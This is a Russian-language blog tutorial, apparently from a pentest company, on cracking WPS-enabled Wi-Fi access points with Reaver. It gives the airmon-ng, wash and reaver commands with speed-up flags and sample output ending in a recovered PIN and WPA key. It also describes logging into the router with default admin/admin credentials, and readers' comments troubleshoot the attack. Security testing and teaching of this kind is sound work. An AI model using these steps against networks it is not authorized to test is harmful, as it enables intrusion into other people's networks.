Reaver. Взлом Wi-Fi со включенным WPS

Сегодня мы попробуем взломать точку доступа со включенным WPS.
Что такое WPS?
Wi-Fi Protected Setup (защищённая установка), WPS — это стандарт (а так же протокол) полуавтоматического подключения к беспроводной сети Wi-Fi. Этот протокол был придуман дл того, чтобы упростить подключение к беспроводной сети. В итоге он и правда упростил подключение к сети. Причем для всех. Для злоумышленника он тоже упростился. Потому что, хоть в коде WPS 8 знаков, но 8-й знак это контрольная сумма, а так же в протоколе есть уязвимость, которая позволяет проверять пин-код блоками, а не целеком. Первый блок 4 цифры и второй блок 3 цифры. итого получается 9999+999=10998 комбинаций.

Как взламывать другие типы шифрования я рассказывал в статьях:
подбор WEP ключей для Wi-Fi
Взлом Wi-Fi с шифрованием WPA/WPA2 PSK

А используемое оборудование в статье:
Оборудование для Вардрайвинга

Для подбора ключа используем дистрибьютив Linux Kali, который был создан для тестов на проникновения. Reaver и остальные утилиты в него уже встроены. Поэтому описывать, как их установить я не буду.

Для начала сделаем подготовительные шаги. Просканируем Wi-Fi диапазон на наличие точек с нужным типом авторизации.
Для этого переведем адаптер в режим мониторинга (будем считать, что Wi-Fi адаптер это wlan0):

airmon-ng start wlan0

В выводе команды мы увидим имя виртуального интерфейса в режиме мониторинга (обычно первый такой интерфейс это mon0).

Теперь просканируем окружающие сети:

wash -i mon0

Увидим список сетей, которые поддерживают WPS. В дальнейшем нам нужен будет BSSID сети из первой колонки.

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:XX:XX:XX:XX:F4 1 -06 1.0 No BXXXXXXXXXXXXXXXXXXXXXXXr
F8:XX:XX:XX:XX:3B 9 -70 1.0 No aXXXXXX4
60:XX:XX:XX:XX:B8 6 -73 1.0 No AXXXXK

И наконец перейдем непосредственно к самому перебору паролей:

reaver -i mon0 -vv -b 64:XX:XX:XX:XX:F4

Где:
-i mon0 это интерфейс.
-b 64:XX:XX:XX:XX:F4 это BSSID атакуемой точки.
-vv необязательный ключ, он включает подробный вывод, но я люблю смотреть что именно сейчас происходит.

Так же есть дополнительные полезные ключи:
‐‐dh-small — задает небольшое значение секретного ключа, чем немного разгружает точку доступа и немного ускоряет брутфорс.

-t 2 — уменьшает время ожидания ответа (по умолчанию 5 секунд) в данном случае до 2 секунд.

-d 0 — пауза между попытками.

Запустится процесс перебора пин-кодов:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Waiting for beacon from 64:XX:XX:XX:XX:F4
[+] Switching mon1 to channel 1
[+] Associated with 64:XX:XX:XX:XX:F4 (ESSID: BXXXXXXXXXXXXXXXXXXXXXXXr)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678

Рано или поздно мы увидим (я увидел примерно чере 6 часов) подобранный пин-код и ключ шифрования сети.

[+] WPS PIN: '762XXX99'
[+] WPA PSK: 'sdfpoXXXXXXXXXXXXXX;akfw'
[+] AP SSID: 'BXXXXXXXXXXXXXXXXXXXXXXXr'
[+] Nothing done, nothing to save.

И далее подключаемся к сети.
После подключения к сети, я попробовал зайти на маршрутизатор. Как это не странно, но логин/пароль: admin/admin подошел. Поэтому так же прилагаю скриншоты пин-кода и пароля Wi-Fi с самой точки доступа.

Все. Точка доступа взломана. Тест на проникновение в сеть оказался успешен.

Заказать Аудит Безопасности или Пентест Вашей IT-инфраструктуры

Быть уверенным в своей IT-инфраструктуре — это быть уверенным в завтрашнем дне.

Для того, чтобы сделать заказ:

Заполните форму обратной связи и мы обязательно с вам свяжемся:
Форма обратной связи
Позвоните нам по телефону:
+7(909)952-44-33
Напишите нам на электронную почту:
order@blackdiver.net
Напишите нам в Telegram:
Telegram
Другие способы связи Вы сможете найти в разделе Контакты.

10 мыслей о “Reaver. Взлом Wi-Fi со включенным WPS”

  1. У меня после ассоциации ничего не происходит. Не хочет перебирать pin’ы и все. Может кто подскажет что?

  2. Привет. У меня прошёл перебор пинов. Я получил пин. Но ключ шифрования выглядит странно. Как бцд-то в мд5. Не могу подключиться

    1. Подключайся к сети с помощью программы QSS for Windows или JumpStart (в зависимости от адаптера) где вводишь 8 цифр ,далее через свойства сети снимаешь галочку (скрыть пароль) и смотришь пароль. Если же в том поле это выглядит типа как ты писал MD5 тогда смотришь ip свой и пытаешься зайти на роутер типа 192.168.10.1 — посмотреть там пароль ,ну типа admin/admin

  3. У МЕНЯ пишется switching mon0 to channel И крутишься 14 каналов это ощибка или взламывает

  4. Поправьте код, нужно в wps фильтр добавить аргумент на игнорирование fcs.
    И вопрос возник по поводу wps v. 1.0. Почему-то пин-перебор с ним бессилен.

  5. WPS transaction failed (code: 0x03),
    крутится на одном пине, то потом (code: 0x02) и опять по кругу с одним пином «12345670» Что это за коды?